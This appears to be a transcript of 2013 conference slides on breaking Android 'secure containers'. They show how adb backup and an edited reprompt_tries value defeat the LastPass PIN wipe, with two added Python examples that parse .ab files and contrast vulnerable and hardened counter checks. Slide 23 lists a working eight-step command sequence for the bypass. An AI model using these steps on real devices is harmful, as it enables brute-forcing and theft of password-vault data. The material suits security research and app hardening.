
@ChrisJohnRiley > whoami • IT Security Analyst / Security Consultant • Raiffeisen Informatik GmbH, R-IT CERT Team • Regular conference speaker: DEF CON | Bsides | Hashdays | SecZone • blog: http://blog.c22.cc • Abject


  1. lastpass • Personal solution (w/ enterprise option) • Uses online sync • Can be secured with a PIN • Can wipe data after 5 false logons • Restricts screenshots https://lastpass.com/android Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 69

  2. Can store lastpass.com password • So users don't need to type it EVERY time • Reduces security • Makes it usable!

  3. Why store the PW?

  4. _ mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&: • Easy to remember • Impossible to type!

  5. It's OK though

  6. You can enable a PIN!

  7. PIN Security • Limited to 4 digits! • “auto-Wipe” data after 5 false logons

  8. PIN == SECURE!

  9. AndroidManifest.xml

  10. AndroidManifest.xml <application android:allowBackup="true">

  11. Default: true

  12. adb backup com.lastpass.lpandroid -f lp.ab

  13. What good is an .ab file?

  14. Android Backup (.ab) • zlib compressed (kinda) • skip header (24 bytes) • pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar

  15. LPandroid.xml • lastpass.com username • lastpass.com password (encoded) • PIN (encoded) • Settings • ...

  16. <string name="reprompt_tries"> 0 </string>

  17. That looks interesting!

  18. THEORY

  19. if reprompt_tries < 5 :
          prompt_for_pin()
      else
          drop_the_DBass()
      end

  20. Theory • reprompt_tries as iterator • increases till it reaches 5 • Sounds reasonable • edit the XML and restore it • Let's set “reprompt_tries” to -9999 then ;)

  21. Proposed Attack • Backup app data • Edit XML • set “reprompt_tries” to -9999 • Repackage • Restore


  23. 0 - adb backup com.lastpass.lpandroid -f lpass.ab
      1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar
      2 - tar -tf lpass.tar > lpass.list
      3 - tar -xvf lpass.tar
      4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml
      5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/
      6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab
      7 - openssl zlib -in lpass_new.tar >> lpass_new.ab
      8 - adb restore lpass_new.ab

  24. Not the easiest process...


  26. counter++

  27. good news …

  28. We get 10,000 tries

  29. bad news …

  30. We get 10,000 tries

  31. Let’s make it easier
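
Added example (not from the original slides): a Python reader for the unencrypted .ab layout described above. It shows where the 24-byte header comes from and lists the shared-preferences files an app exposes through adb backup, which is what an app owner would audit. The package name com.example.app and the sample backup are constructed for illustration.

```python
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"

def parse_ab(data):
    """Return (header fields, tar payload bytes) for an Android backup."""
    stream = io.BytesIO(data)
    # Four newline-terminated text lines: magic, version, compressed, encryption.
    magic, version, compressed, encryption = (
        stream.readline().rstrip(b"\n") for _ in range(4))
    if magic != MAGIC:
        raise ValueError("not an Android backup file")
    if encryption != b"none":
        raise ValueError("encrypted backup: payload is not readable as-is")
    header = {"version": int(version), "compressed": compressed == b"1",
              "header_len": stream.tell()}
    payload = stream.read()
    if header["compressed"]:
        payload = zlib.decompress(payload)  # zlib stream follows the text header
    return header, payload

def shared_prefs_in_backup(data):
    """List files under an app's sp/ (shared preferences) directory."""
    _, tar_bytes = parse_ab(data)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        return sorted(m.name for m in tar.getmembers()
                      if m.isfile() and "/sp/" in m.name)

def build_sample_ab():
    """Constructed sample: one prefs file and one database for com.example.app."""
    files = {"apps/com.example.app/sp/settings.xml": b"<map></map>",
             "apps/com.example.app/db/cache.db": b"\x00"}
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return MAGIC + b"\n1\n1\nnone\n" + zlib.compress(buf.getvalue())

if __name__ == "__main__":
    sample = build_sample_ab()
    print(parse_ab(sample)[0])
    print(shared_prefs_in_backup(sample))
```

For an unencrypted backup the four header lines ("ANDROID BACKUP", version, compression flag, "none") add up to 24 bytes, which is the offset the dd command skips.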
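
Added example (not from the original slides, and not LastPass code): the upper-bound-only check theorised above, next to a version that fails closed on any stored counter outside 0..4, with a small simulation of how many wrong PINs each one accepts. The function names and prefs fragments are constructed; the limit of 5 and the value -9999 come from the slides.

```python
import re

MAX_TRIES = 5  # wipe threshold stated on the slides

def load_tries(prefs_xml):
    """Read reprompt_tries from shared-prefs XML; None if missing or not an integer."""
    m = re.search(r'<string name="reprompt_tries">\s*(-?\d+)\s*</string>', prefs_xml)
    return int(m.group(1)) if m else None

def vulnerable_check(tries):
    # Theorised logic: only the upper bound is tested, so negative values pass.
    return tries is not None and tries < MAX_TRIES

def hardened_check(tries):
    # Fail closed: a missing, garbled or out-of-range counter means lock out.
    return tries is not None and 0 <= tries < MAX_TRIES

def pins_accepted(check, prefs_xml):
    """Simulate consecutive wrong PINs; return how many prompts are granted."""
    tries, granted = load_tries(prefs_xml), 0
    while check(tries):
        granted += 1
        tries += 1  # counter++ after each wrong PIN
    return granted

# Constructed prefs fragments, same element as shown in LPandroid.xml above.
FRESH = '<string name="reprompt_tries"> 0 </string>'
EDITED = '<string name="reprompt_tries"> -9999 </string>'

if __name__ == "__main__":
    for label, xml in (("fresh", FRESH), ("edited", EDITED)):
        print(label,
              pins_accepted(vulnerable_check, xml),   # fresh: 5, edited: 10004
              pins_accepted(hardened_check, xml))     # fresh: 5, edited: 0
```

Range validation alone does not stop the counter being rolled back to 0 by restoring an older backup; that needs android:allowBackup="false" or a counter kept outside backed-up storage.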
